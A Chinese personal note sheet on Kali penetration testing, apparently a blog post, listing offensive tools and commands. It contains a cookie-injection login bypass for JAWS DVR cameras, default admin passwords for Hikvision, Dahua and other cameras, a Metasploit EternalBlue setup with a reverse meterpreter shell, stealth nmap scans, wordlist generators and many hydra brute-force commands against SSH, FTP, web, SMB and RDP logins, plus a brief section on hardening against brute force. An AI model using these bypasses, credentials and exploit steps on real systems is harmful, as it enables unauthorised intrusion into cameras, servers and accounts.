web安全笔记-kali渗透-(比较乱主要记录工具方法)

宰父单弓
2023-12-01

kali更新MFS

1. 更换yum源地址
2. 添加kali数字签名
3. 如果出现无法更新建议卸载MFS之后在安装
4. sudo rm 对锁强制解锁进行安装
5. 启动数据库 postgresql 设置开机自动启动

撒旦之眼

https://www.shodan.io/

在输入框输入 prot:3389 os:windows

摄像头

JAWS/1.1

输入

document.cookie="dvr_camcnt=4";
document.cookie="dvr_usr=admin";
document.cookie="dvr_pwd=123";

在url 后面加上 10.1.1.1:8080//view2.html

摄像头2

海康威视

admin 123456

大华网络摄像机

admin 888888

天地伟业

Admin 111111

Hikvision

Server:DVRDVS-Webs

msfconsole 工具开启 (永恒之蓝)

1.开启命令

msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOSTS *(目标ip)
set LHOST (本地ip)

nmap

nmap -sP ip地址 /24  不指定端口
	-p 指定端口
	-p-全端口
-sT TCP全连接扫描 会留下记录
扫描方法:nmap扫描类型主要有TCP的全连接扫描(会在被扫描机器留下记录),半连接扫描(不会留下记录),FIN扫描(可以判断对方操作系统的类型)。
-sS TCP半连接扫描  
-sN 隐蔽扫描
-sX 隐蔽扫描
-sF 隐蔽扫描
-O 对方系统类型 (不太准确)
-oN/oX   txt/xml

字典生成工具 crunch

参数详解

     min    设定最小字符串长度(必选)
     max    设定最大字符串长度(必选)
     
     oprions
     -b     指定文件输出的大小,避免字典文件过大  
     -c     指定文件输出的行数,即包含密码的个数
     -d     限制相同元素出现的次数
     -e     定义停止字符,即到该字符串就停止生成
     -f     调用库文件(/etc/share/crunch/charset.lst)
     -i     改变输出格式,即aaa,aab -> aaa,baa
     -I     通常与-t联合使用,表明该字符为实义字符
     -m     通常与-p搭配
     -o     将密码保存到指定文件
     -p     指定元素以组合的方式进行
     -q     读取密码文件,即读取pass.txt
     -r     定义重某一字符串重新开始
     -s     指定一个开始的字符,即从自己定义的密码xxxx开始
     -t     指定密码输出的格式
     -u     禁止打印百分比(必须为最后一个选项)
     -z     压缩生成的字典文件,支持gzip,bzip2,lzma,7z  

CUPP

CUPP是一个非常强大的工具,专门为一个人创建一个词汇表。CUPP是跨平台的,用Python编写。CUPP向您询问有关目标(姓名,妻子姓名,宠物名称......)的问题,然后根据您输入的关键字创建一个密码。

hydra (九头蛇 在线破解工具)

一、简介
hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。
官 网:http://www.thc.org/thc-hydra。

可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。

二、安装
Hydra 安装

# wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz
# tar zxvf hydra-8.1.tar.gz 
# cd hydra-8.1 
# ./configure 
# make && make install 
 
三、参数说明 
 
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] 
 
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] 
 
-R 继续从上一次进度接着破解。 
 
-S 采用SSL链接。 
 
-s PORT 可通过这个参数指定非默认端口。 
 
-l LOGIN 指定破解的用户,对特定用户破解。 
 
-L FILE 指定用户名字典。 
 
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。 
 
-P FILE 大写,指定密码字典。 
 
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 
 
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 
 
-M FILE 指定目标列表文件一行一条。 
 
-o FILE 指定结果输出文件。 
 
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 
 
-t TASKS 同时运行的线程数,默认为16。 
 
-w TIME 设置最大超时的时间,单位秒,默认是30s。 
 
-v / -V 显示详细过程。 
 
server 目标ip 
 
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt 
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc 
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec 
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere 
teamspeak sip vmauthd firebird ncp afp等等。 
 
OPT 可选项

四、各种用法实例

1、破解ssh: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 
 
 
2、破解ftp: 
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 
 
 
3、get方式提交,破解web登录: 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
 
 
4、post方式提交,破解web登录: 
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 
 
 
5、破解https: 
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 
 
 
 
6、破解teamspeak: 
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 
 
 
 
7、破解cisco: 
hydra -P pass.txt 10.36.16.18 cisco 
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 
 
 
 
8、破解smb: 
hydra -l administrator -P pass.txt 10.36.16.18 smb 
 
 
 
9、破解pop3: 
hydra -l muts -P pass.txt my.pop3.mail pop3 
 
 
 
10、破解rdp: 
hydra ip rdp -l administrator -P pass.txt -V 
 
 
 
11、破解http-proxy: 
hydra -l admin -P pass.txt http-proxy://10.36.16.18 
 
 
 
12、破解imap: 
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

theHarvester 邮箱搜集

黑帽大牛网站 http://caidaome.com/?sort=5

SQL 注入

服务器提权 mof | udf 提权

sql注入分类

1.数字型
2.字符型

注入手法

1 联合查询注入
2 报错型注入
3 布尔型注入
4 基于时间延迟注入
5 可多语句查询注入

渗透软件

DirBuster

 DirBuster是Owasp(Open Web APPlication Security Project )开发的一款专门用于探测网站目录和文件(包括隐藏文件)的工具。由于使用java编写,电脑中要装有JDK才能运行

御剑

github地址 https://github.com/foryujian/yjdirscan

火狐工具 wappalyzer

Wappalyzer是一款能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、JavaScript框架、编程语言等参数的chrome网站技术分析插件。

渗透环境搭建模型 dvwa

图片木马制作

edjpgcom 图片木马

web扫描软件

AppScan

BurpSuite

arachni

防御暴力破解

1.useradd yangge -s /sbin/nologin
2.秘密复杂性 
大小写+数字+特殊符号+20为以上+定期更换
3修改默认端口
4.限制登陆的用户组或者数据
5.使用sudo
6.基于PAM 实现登陆限制
auth required pam_tally2.so deny=2 even_deny_root root_unlock_time=60 unlock_time=6

指纹识别工具

国外指纹识别工具 whatweb

获取网站信息插件 Web Developer

 类似资料: